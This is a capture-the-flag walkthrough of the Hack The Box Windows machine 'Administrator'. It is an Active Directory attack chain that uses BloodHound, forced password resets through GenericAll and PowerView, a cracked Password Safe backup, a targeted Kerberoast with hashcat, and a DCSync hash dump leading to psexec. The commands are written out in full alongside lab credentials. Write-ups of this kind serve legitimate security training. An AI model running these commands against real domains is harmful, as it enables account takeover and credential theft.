HTB | Administrator

This is a Windows box. You can find it here.

Skill Learned

• bloodhound

• GenericALL

• ForchChangePassword

• passwordsafe

• GenericWrite

• DCSync

NMAP

IP: 10.129.33.100 after release arena 10.10.11.42

we were given cred Olivia / ichliebedich

nmap -sT -p- --min-rate 10000 10.129.33.100

nmap

LDAP - TCP 389

ldapsearch -H ldap://10.129.33.100 -x -s base namingcontexts

From the above, we can confirm the DC name administrator.htb

Since we have the credentials for the user, Let's use bloodhound-python for further enumeration

bloodhound-python -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 -c All

bloodhound-python

This will give us the JSON files which we can load into Bloodhound and analysis

On analysing the user Olivia of which we have credentials we found that Olivia has genericALL (refer to this or this for exploit and explanation) or rights over michale That means we can change the password of Michale.

Foothold/shell

GenericALL

We can use evil-winrm to get into the server

evil-winrm as olivia

Since we have GenericALL rights over Michale we can change its password

net user michael P@ssw0rd /domain

Now we can use evil-winrm to login as Michale

evil-winrm as michael

ForceChangePassword

Since we have shell as Michael, we will look back in Bloodhound. After analysing we found out that Michael can change the password for Benjamin.

To change the password of Benjamin recommended way (see Help in Bloodhound for ForceCHangePassword) is to use PowerView's Set-DomainUserPassword

Let's upload the PowerView.ps1 on the box

upload PowerView.ps1

Import-Module .\PowerView.ps1

Let's change the password of benjamin

$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 
Set-DomainUserPassword -Identity 'benjamin' -AccountPassword $NewPassword

password change for benjamin

We can enumerate SMB via Benjamin's credentials. But we only found READ-ONLY access.

smbmap

Passwordsafe

Since Port 21 (FTP) was also open, we can FTP using Benjamin's credentials

There is a backup file in the FTP share, Let's download it for further analysis

The backup file is passwordsafe file

ftp

Since the Backup.psafe3 is a password-protected file we have to find the password for the same. We will use John the ripper to find the password. We found the password for passwordsafe file

john

Now we can open passwordsafe with the password

passwordsafe

We found the password for Emily, let's copy it and use it to get the shell and we are in as Emily and found the user.txt

user.txt

Priv Esc

GenericWrite

Now we have a new user, Emily, we will look back into Bloodhound to see what access Emily has over other users. Emily has GenericWrite over Ethan

The Help in Bloddhound for GenericWrite Says

A targeted kerberoast attack can be performed using PowerView's Set-DomainObject along with Get-DomainSPNTicket.

We can do this by:

$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force 
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword) 
Set-DomainObject -Credential $Cred -Identity ethan -SET @{serviceprincipalname='nonexistent/anurag'} 
Get-DomainUser ethan 
Get-DomainSPNTicket -SPN "nonexistent/anurag" -Credential $Cred

and we have hashes

hashes

We can crack the hash using hashcat

hashcat -m 13100 ethan.hash /home/anurag/stuff/rockyou.txt

ethan password

DCSync

From the Bloodhound analysis, we know that Ethan has DCSync over Administrator. That means we can dump administrator hash via sectrtsdump.py

Now we will use secretsdump.py to dump hashes

admin hash

From the hash, we can get the shell via psexec. We found the root.txt

root.txt